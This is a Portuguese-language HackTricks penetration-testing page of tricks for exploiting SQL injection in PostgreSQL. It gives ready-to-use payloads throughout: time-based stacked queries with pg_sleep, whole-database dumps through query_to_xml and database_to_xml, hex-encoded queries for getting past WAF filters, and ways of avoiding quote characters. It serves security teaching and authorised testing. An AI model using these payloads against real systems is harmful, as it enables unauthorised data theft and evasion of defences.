# Injeção PostgreSQL

{{#include ../../../banners/hacktricks-training.md}}


---

**Esta página tem como objetivo explicar diferentes truques que podem ajudá-lo a explorar uma SQL injection encontrada em um banco de dados postgresql e complementar os truques que você pode encontrar em** [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)

## Interação de Rede - Escalação de Privilégios, Scanner de Portas, Divulgação de Resposta de Desafio NTLM & Exfiltração

O **módulo PostgreSQL `dblink`** oferece capacidades para conectar a outras instâncias PostgreSQL e executar conexões TCP. Esses recursos, combinados com a funcionalidade `COPY FROM`, permitem ações como escalonamento de privilégios, varredura de portas e captura de resposta de desafio NTLM. Para métodos detalhados sobre como executar esses ataques, verifique como [realizar esses ataques](network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md).

### **Exemplo de exfiltração usando dblink e objetos grandes**

Você pode [**ler este exemplo**](dblink-lo_import-data-exfiltration.md) para ver um exemplo de CTF de **como carregar dados dentro de objetos grandes e, em seguida, exfiltrar o conteúdo de objetos grandes dentro do nome de usuário** da função `dblink_connect`.

## Ataques PostgreSQL: Leitura/escrita, RCE, privesc

Verifique como comprometer o host e escalar privilégios a partir do PostgreSQL em:


{{#ref}}
../../../network-services-pentesting/pentesting-postgresql.md
{{#endref}}

## Bypass de WAF

### Funções de String PostgreSQL

Manipular strings pode ajudá-lo a **burlar WAFs ou outras restrições**.\
[**Nesta página**](https://www.postgresqltutorial.com/postgresql-string-functions/)**você pode encontrar algumas funções de Strings úteis.**

### Consultas Empilhadas

Lembre-se de que o postgresql suporta consultas empilhadas, mas várias aplicações gerarão um erro se 2 respostas forem retornadas quando se espera apenas 1. Mas, você ainda pode abusar das consultas empilhadas via injeção de Tempo:
```
id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -
```
### XML tricks

**query_to_xml**

Esta função retornará todos os dados em formato XML em apenas um arquivo. É ideal se você quiser despejar muitos dados em apenas 1 linha:
```sql
SELECT query_to_xml('select * from pg_user',true,true,'');
```
**database_to_xml**

Esta função irá despejar todo o banco de dados em formato XML em apenas 1 linha (tenha cuidado se o banco de dados for muito grande, pois você pode causar um DoS ou até mesmo no seu próprio cliente):
```sql
SELECT database_to_xml(true,true,'');
```
### Strings em Hex

Se você puder executar **consultas** passando-as **dentro de uma string** (por exemplo, usando a função **`query_to_xml`**). **Você pode usar o convert_from para passar a string como hex e contornar filtros dessa forma:**
```sql
select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');

# Bypass via stacked queries + error based + query_to_xml with hex
;select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -h

# Bypass via boolean + error based + query_to_xml with hex
1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -
```
### Citações proibidas

Se você não puder usar citações para seu payload, pode contornar isso com `CHR` para cláusulas básicas (_a concatenação de caracteres funciona apenas para consultas básicas, como SELECT, INSERT, DELETE, etc. Não funciona para todas as instruções SQL_):
```
SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
```
Ou com `$`. Essas consultas retornam os mesmos resultados:
```
SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;
```
{{#include ../../../banners/hacktricks-training.md}}